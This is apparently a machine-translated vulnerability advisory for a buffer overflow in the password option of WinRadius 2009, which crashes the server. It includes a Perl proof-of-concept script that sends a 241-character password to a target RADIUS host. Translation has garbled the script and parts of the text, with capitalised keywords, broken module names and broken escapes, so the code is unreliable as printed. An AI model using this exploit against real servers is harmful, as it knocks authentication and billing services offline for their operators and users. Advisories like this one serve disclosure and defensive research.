Buffer overflow vulnerability in WinRadius password option size verification

Release date:
Updated on:

Affected Systems:
WinRadius 2009
Description:
--------------------------------------------------------------------------------
Bugtraq id: 53702

WinRadius is a commercial software suitable for dial-up authentication, accounting, and billing in China based on the standard RADIUS protocol.

A denial of service vulnerability exists in implementation in versions earlier than WinRadius 2009. The WinRadius server is bound to udp ports 1812 and 1813, but does not have the authentication domain option size. When sending more than 240 characters, attackers can exploit this vulnerability to cause server crashes.

<* Source: demonalex

Link: http://www.securityfocus.com/archive/1/522878
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Demonalex () provides the following test methods:

-----------------------------------------------------------
#! /Usr/bin/perl
Use Authen: Simple: RADIUS;
$ | = 1;
$ Host = shift | die "usage: $0 host \ n ";
Print "Launch Attack... \ n ";
$ Username = int (rand (10). int (rand (10). int (rand (10 ));
$ Password = 'A' x241;
$ Secret = int (rand (10). int (rand (10). int (rand (10 ));
$ Radius = Authen: Simple: RADIUS-> new (
Host => $ host,
Secret => $ secret
);
$ Radius-> authenticate ($ username, $ password );
Print "Finish! \ N ";
Exit (1 );
-----------------------------------------------------------

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

WinRadius
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.elite-school.com/saas/WinRadius/